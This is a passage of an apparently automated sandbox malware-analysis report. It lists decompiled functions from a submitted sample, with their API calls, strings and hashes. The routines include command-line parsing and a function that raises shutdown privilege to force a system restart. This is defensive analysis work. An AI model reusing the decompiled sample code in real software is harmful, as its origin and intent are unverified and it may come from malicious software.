				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00e566b1
0x00e566ba
0x00e566c7
0x00e566bc
0x00e566be
0x00e566be

APIs

GetFileAttributesA.KERNELBASE(?,00E54777,?,00E54E38,?), ref: 00E566B1

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 76b9e75d9886ba3991a0f373ab9f2cabc9c838b4f0b37088686846309c058b4f
Instruction ID: 439ada03d2c7e9cabce9e3530445c7fac89fc0fe7c487ae4793f2253b98e7649
Opcode Fuzzy Hash: 76b9e75d9886ba3991a0f373ab9f2cabc9c838b4f0b37088686846309c058b4f
Instruction Fuzzy Hash: 37B0927623254146AA2407326C2956A2841A7C123B7E82FA0F032E12E0CA7EC84AD004

Uniqueness

Uniqueness Score: -1.00%

Function 00E54CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E54CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00e54caa
0x00e54cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00E54CAA

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 020ad4b09b79f544a14b9ef148b7d97d3db79dd724099c78a054eb849264b558
Instruction ID: ea521972640272a3f39b3ef92fa6b6bb076e300e5da64e59652c3569f8104e9f
Opcode Fuzzy Hash: 020ad4b09b79f544a14b9ef148b7d97d3db79dd724099c78a054eb849264b558
Instruction Fuzzy Hash: 8FB0123204430CBBCF001FC3EC09F863F1DE7C4762F180010F60C450908AB294108696

Uniqueness

Uniqueness Score: -1.00%

Function 00E54CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E54CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00e54cc8
0x00e54ccf

APIs

GlobalFree.KERNELBASE ref: 00E54CC8

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 8b9ee6186ee6d8a51df32fdb831f3bc94089d77a5cda3535d4280161ebef47d6
Instruction ID: 51688244bc6dded37e0a6c2c66789e36fb9aa2e69679c2898f95c60b0fa29142
Opcode Fuzzy Hash: 8b9ee6186ee6d8a51df32fdb831f3bc94089d77a5cda3535d4280161ebef47d6
Instruction Fuzzy Hash: 84B0123100020CBBCF001B43EC088453F1DD7C02617040020F60C410218B7398118585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E55C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00E55C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xe58004; // 0x5ba1a886
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00E56CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00E56E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xe58004; // 0x5ba1a886
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00E5597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00E544B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xe59124 = E00E56285();
									_t75 = 0;
								}
								return E00E56CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00E544B9(0, 0x521, 0xe51140, 0, 0x40, 0);
												_t85 =  *0xe58588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00E5667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00E5667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00E55C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00E51680(0xe58c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00E5667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00E5667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xe58a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00E55C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xe58b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xe58a3a;
																}
																E00E51680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00E5658A(_t218, 0x104, 0xe51140);
																if(E00E531E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xe58a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xe58a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xe58a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xe58a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xe58a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xe59a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xe59a2c =  *0xe59a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xe58d48 =  *0xe58d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xe59a2c =  *0xe59a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xe59a2c =  *0xe59a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xe58d48 =  *0xe58d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xe59a2c =  *0xe59a2c | 0x00000004;
																										L70:
																										 *0xe58a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xe59a2c = 3;
																	 *0xe58a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xe58a2c != 0 &&  *0xe58b3e == 0) {
						if(GetModuleFileNameA( *0xe59a3c, 0xe58b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00E566C8(0xe58b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00e55c9e
0x00e55ca9
0x00e55cb0
0x00e55cb3
0x00e55cb6
0x00e55cb7
0x00e55cb8
0x00e55cbd
0x00e56204
0x00e55ccb
0x00000000
0x00e55ccb
0x00e55cd3
0x00e55cd7
0x00e55cf4
0x00000000
0x00e55cf4
0x00e55cf8
0x00e55d00
0x00000000
0x00e55d06
0x00e55d06
0x00e55d0e
0x00e55d10
0x00e55d12
0x00e55d14
0x00e55d15
0x00e55d17
0x00e55d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00e55d19
0x00e55d19
0x00e55d1d
0x00000000
0x00e55d3f
0x00e55d3f
0x00e55d4b
0x00e55d4b
0x00e55d4f
0x00e55d8d
0x00000000
0x00e55d93
0x00e55d93
0x00e55d9a
0x00e55d9d
0x00e55d9e
0x00000000
0x00e55d9e
0x00e55d51
0x00e55d5b
0x00e55d72
0x00e560fb
0x00e560fb
0x00e56207
0x00e5620a
0x00e5620b
0x00e5620e
0x00e56217
0x00e55d78
0x00e55d78
0x00e55d80
0x00e55d83
0x00e55d84
0x00000000
0x00e55d84
0x00e55d5d
0x00e55d5f
0x00e55d62
0x00e55d68
0x00e55d64
0x00e55d64
0x00e55d64
0x00000000
0x00e55d62
0x00e55d5b
0x00e55d4f
0x00e55d1d
0x00000000
0x00e55d9f
0x00e55d9f
0x00e55da5
0x00e55dab
0x00e55dba
0x00e56218
0x00e5621d
0x00e56220
0x00e56221
0x00e56229
0x00e56230
0x00e56247
0x00e5626a
0x00e56272
0x00e56249
0x00e56255
0x00e5625f
0x00e56264
0x00e56264
0x00e56284
0x00e55dc0
0x00e55dc0
0x00e55dca
0x00e55e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00e55dcc
0x00e55dce
0x00e55e24
0x00e55e24
0x00e55e2c
0x00e55e47
0x00e55e4a
0x00e561d2
0x00e561e2
0x00e561e7
0x00e561ee
0x00e561f1
0x00e561f1
0x00e561f8
0x00e561f8
0x00e55e50
0x00e55e53
0x00e56109
0x00e5611f
0x00000000
0x00e56125
0x00e56137
0x00e5613a
0x00e5613c
0x00e5613e
0x00e5613e
0x00e56141
0x00e56141
0x00e56143
0x00e56144
0x00e5614a
0x00000000
0x00e56150
0x00e56152
0x00e5615c
0x00e56170
0x00e56172
0x00e5617c
0x00e56190
0x00e56190
0x00e56196
0x00e561a5
0x00000000
0x00e561ab
0x00e561b9
0x00e561c6
0x00e561c6
0x00e5617e
0x00e56180
0x00e5618a
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5618a
0x00e5615e
0x00e56160
0x00e5616a
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5616a
0x00e5615c
0x00e5614a
0x00e5610b
0x00e5610e
0x00e5610e
0x00000000
0x00e55e59
0x00e55e59
0x00e55e5c
0x00e5604f
0x00e56056
0x00000000
0x00e5605c
0x00e5606e
0x00e56071
0x00e56073
0x00e56075
0x00e56075
0x00e56078
0x00e56078
0x00e5607a
0x00e5607b
0x00e56081
0x00000000
0x00e56087
0x00e56087
0x00e5608d
0x00e5609c
0x00000000
0x00e560a2
0x00e560aa
0x00e560b2
0x00e560b7
0x00e560bd
0x00e560bf
0x00e560bf
0x00e560d6
0x00e560e0
0x00e560e7
0x00e560f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00e560f5
0x00e5609c
0x00e56081
0x00e55e62
0x00e55e62
0x00e55e65
0x00e55fd3
0x00e55fe9
0x00000000
0x00e55fef
0x00e55fef
0x00e55ff7
0x00e55ffd
0x00e56003
0x00e56006
0x00e56011
0x00e56014
0x00e5603d
0x00e56016
0x00e56018
0x00e56019
0x00e5601b
0x00e56033
0x00e5601d
0x00e56020
0x00e56029
0x00e56022
0x00e56022
0x00e56022
0x00e56020
0x00e5601b
0x00e56042
0x00e56044
0x00e56046
0x00e5604a
0x00e55ff7
0x00e55fd5
0x00e55fd8
0x00e55fd8
0x00000000
0x00e55e6b
0x00e55e6b
0x00e55e6e
0x00e55f8b
0x00e55f99
0x00000000
0x00e55f9f
0x00e55fa7
0x00e55faf
0x00000000
0x00e55fb1
0x00e55fb3
0x00000000
0x00e55fb5
0x00e55fb7
0x00000000
0x00e55fb9
0x00000000
0x00e55fb9
0x00e55fb7
0x00e55fb3
0x00e55faf
0x00e55f8d
0x00e55f8d
0x00e55f8d
0x00e55f8f
0x00e55fc1
0x00e55fc1
0x00e55fc1
0x00000000
0x00e55e74
0x00e55e74
0x00e55e77
0x00e55ea0
0x00e55ebd
0x00e55f79
0x00000000
0x00e55f7f
0x00e55ec3
0x00e55ec3
0x00e55ecc
0x00e55ed4
0x00e55ed6
0x00e55edc
0x00e55edf
0x00e55eea
0x00e55eed
0x00e55f3f
0x00e55f40
0x00000000
0x00e55eef
0x00e55eef
0x00e55ef2
0x00e55f34
0x00e55ef4
0x00e55ef4
0x00e55ef7
0x00e55f2b
0x00000000
0x00e55ef9
0x00e55ef9
0x00e55efc
0x00e55f22
0x00000000
0x00e55efe
0x00e55eff
0x00e55f02
0x00e55f16
0x00e55f04
0x00e55f07
0x00e55f0d
0x00e55f46
0x00e55f46
0x00e55f09
0x00e55f09
0x00e55f09
0x00e55f07
0x00e55f02
0x00e55efc
0x00e55ef7
0x00e55ef2
0x00e55f4c
0x00e55f4e
0x00e55f50
0x00e55f54
0x00e55ed4
0x00e55ea2
0x00e55ea4
0x00e55eaf
0x00e55eaf
0x00000000
0x00e55e79
0x00e55e7d
0x00000000
0x00e55e83
0x00e55e83
0x00e55e83
0x00e55e85
0x00e55e85
0x00e55e8e
0x00000000
0x00e55e94
0x00000000
0x00e55e94
0x00e55e8e
0x00e55e7d
0x00e55e77
0x00e55e6e
0x00e55e65
0x00e55e5c
0x00000000
0x00000000
0x00000000
0x00e55dd0
0x00e55dd0
0x00e55dd0
0x00000000
0x00e55dd0
0x00e55dce
0x00e55dca
0x00e55dba
0x00000000
0x00e55d00
0x00e55dd9
0x00e55e04
0x00e561fe
0x00e55e0a
0x00e55e0c
0x00e55e17
0x00e55e17
0x00e55e04
0x00e56200
0x00e56200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00E55CEE
GetModuleFileNameA.KERNEL32(00E58B3E,00000104,00000000,?,?), ref: 00E55DFC
CharUpperA.USER32(?), ref: 00E55E3E
CharUpperA.USER32(-00000052), ref: 00E55EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00E55F6F
CharUpperA.USER32(?), ref: 00E55FA7
CharUpperA.USER32(-0000004E), ref: 00E56008
CharUpperA.USER32(?), ref: 00E560AA
CloseHandle.KERNEL32(00000000,00E51140,00000000,00000040,00000000), ref: 00E561F1
ExitProcess.KERNEL32 ref: 00E561F8

Strings

", xrefs: 00E5612D
", xrefs: 00E55D78
RegServer, xrefs: 00E55F66
:, xrefs: 00E56118

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 9d8b569d1064bfca1099da36b29522c1a985bae5e912311c2cf6066d10db4d4e
Instruction ID: 5a7beeaaec659a0eb835d8650cb4b979e9e07c65aafc756ee79cecea7cf34fa9
Opcode Fuzzy Hash: 9d8b569d1064bfca1099da36b29522c1a985bae5e912311c2cf6066d10db4d4e
Instruction Fuzzy Hash: 4DD13973A04A445EDF358B398C693FA77A1971630BF542DA5CC86B7191DB708E8E8B10

Uniqueness

Uniqueness Score: -1.00%

Function 00E51F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00E51F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xe59a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xe58004; // 0x5ba1a886
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00E544B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00E56CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00E544B9(0, 0x522, 0xe51140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00E51EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00e51f90
0x00e51f90
0x00e51f93
0x00e51f98
0x00e51fa4
0x00e51fa7
0x00e51fc5
0x00e51fcd
0x00e51fdb
0x00e51ee5
0x00e51eea
0x00e51ef1
0x00e51ef4
0x00e51f0c
0x00e51f2e
0x00e51f3a
0x00e51f46
0x00e51f4d
0x00e51f58
0x00e51f60
0x00e51f61
0x00e51f62
0x00e51f75
0x00e51f80
0x00e51f77
0x00e51f77
0x00000000
0x00e51f77
0x00e51f64
0x00e51f64
0x00000000
0x00e51f64
0x00e51f0e
0x00e51f0e
0x00e51f13
0x00e51f13
0x00e51f14
0x00e51f14
0x00e51f16
0x00e51f17
0x00e51f1a
0x00e51f1f
0x00e51f1f
0x00e51f86
0x00e51f8f
0x00e51fcf
0x00e51fd3
0x00000000
0x00e51fd3
0x00e51fa9
0x00e51fb4
0x00e51fbb
0x00e51fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00e51fc3
0x00e51f9a
0x00e51f9a
0x00e51fa2
0x00e51fd9
0x00e51fda
0x00000000
0x00000000
0x00000000
0x00e51fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00E51EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00E51F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00E51FD3

Strings

SeShutdownPrivilege, xrefs: 00E51F28

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 1f58b83c170a6aac3f123dd4e46b49deb527100a123eeff2847fd4df1d0713d8
Instruction ID: c9b1dba5b5b0ffde5c7632dc5df3fd19c2a3b69df151f0d78af4de71b3df43f0
Opcode Fuzzy Hash: 1f58b83c170a6aac3f123dd4e46b49deb527100a123eeff2847fd4df1d0713d8
Instruction Fuzzy Hash: 2621D5B1B403056BDB205BA29C4AFBF7AB8DF85717F141968FE02F20C1D77488089271

Uniqueness

Uniqueness Score: -1.00%

Function 00E56CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E56CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0xe56e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00e56cf7
0x00e56cfd
0x00e56d00
0x00e56d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E56E26,00E51000), ref: 00E56CF7
UnhandledExceptionFilter.KERNEL32(&n,?,00E56E26,00E51000), ref: 00E56D00
GetCurrentProcess.KERNEL32(C0000409,?,00E56E26,00E51000), ref: 00E56D0B
TerminateProcess.KERNEL32(00000000,?,00E56E26,00E51000), ref: 00E56D12

Strings

&n, xrefs: 00E56CFD

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n
API String ID: 3231755760-661210962
Opcode ID: 635a8106bd594b33c38065165b92e703a7f4284fd8cf9b4fe6f6a8aa3681ba53
Instruction ID: f94b5b4e9e7368f1b2acc8596cf4ad97d711b010bd9c92dbfc0b87bdad267b43
Opcode Fuzzy Hash: 635a8106bd594b33c38065165b92e703a7f4284fd8cf9b4fe6f6a8aa3681ba53
Instruction Fuzzy Hash: B8D0C9B2001B08BFDB042BF2EE0CA693F28EB48213F4C4920F319A2020CA3254558B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E53210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

